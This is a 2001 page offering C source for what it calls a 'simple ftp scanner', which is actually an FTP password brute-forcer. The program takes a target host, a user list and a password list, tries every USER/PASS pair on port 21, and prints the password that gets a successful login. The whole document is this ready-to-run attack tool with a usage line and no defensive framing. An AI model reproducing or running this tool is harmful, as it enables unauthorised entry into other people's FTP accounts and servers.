===== simple ftp scanner =====
written by MoD and ZehDeh 2001

=== example of a simple ftp scanner in c ===
<code c>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>


void logintoftp();

char tmp[256];
char name[300], pass[300], buf[300], buf2[300];
char snd[1024], rcv[1024];
int n;

int sockfd;

int main(int argc, char **argv)
{
	char sendln[1024], recvln[4048], buf1[800], buf2[1000];
	char *p, *q;
	int len, offset = 0, i,w;
	struct sockaddr_in cli;
	FILE *passwd, *userlist;

	if(argc<4)
	{
	printf("usage: %s [host] [userlist] [passwordfile]\n",argv[0]);
	exit(0);
	}

	passwd=fopen(argv[3],"r+");
	if(!passwd)
	{
	printf("Cannot open %s\n\n",argv[3]);
	exit(0);
	}
	fclose(passwd);
	userlist=fopen(argv[2],"r+");
	if(!userlist)
	{
	printf("Cannot open %s\n\n",argv[2]);
	exit(0);
	}
        while(!feof(userlist))
	{
	fgets(buf,300,userlist);
        sscanf(buf, "%s", name);
	passwd=fopen(argv[3],"r+");
	while(!feof(passwd))
	{
	fgets(buf2,300,passwd);
        sscanf(buf2, "%s", pass);
	printf("%s\n",pass);
	bzero(&cli, sizeof(cli));
	bzero(recvln, sizeof(recvln));
	bzero(sendln, sizeof(sendln));
	cli.sin_family = AF_INET;
	cli.sin_port = htons(21);
	inet_pton(AF_INET, argv[1], &cli.sin_addr);
	if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
		perror("socket");
		exit(0);
	}
	if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
		perror("connect");
		exit(0);
	}
	while((len = read(sockfd, recvln, sizeof(recvln))) > 0){
		recvln[len] = '\0';
		if(strchr(recvln, '\n') != NULL)
			break;
	}
	logintoftp(sockfd); 
	bzero(sendln, sizeof(sendln));
	close(sockfd);
	
	}
	fclose(passwd);
	printf("nothing found ohhh :-(\n\n");
	}
	fclose(userlist);

}


void logintoftp()
{
	
char test[20];
	printf("logging in with %s: %s\n", name, pass);
 	memset(snd, '\0', 1024);
	sprintf(snd, "USER %s\r\n", name);
	write(sockfd, snd, strlen(snd));

        while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
                rcv[n] = 0;
                if(strchr(rcv, '\n') != NULL)
                        break;
        }

	memset(snd, '\0', 1024);
        sprintf(snd, "PASS %s\r\n", pass);
        write(sockfd, snd, strlen(snd));

	while((n=read(sockfd, rcv, sizeof(rcv))) > 0){

	sprintf(test,"%c%c%c",rcv[0],rcv[1],rcv[2]);
	if(strcmp(test,"230")==0)
	{
	printf("Drin ...\nPassword: %s\n\n",pass);
	exit(0);
	}
	
	rcv[n] = 0;
		if(strchr(rcv, '\n') != NULL)
			break;
	}
	return;
}
</code>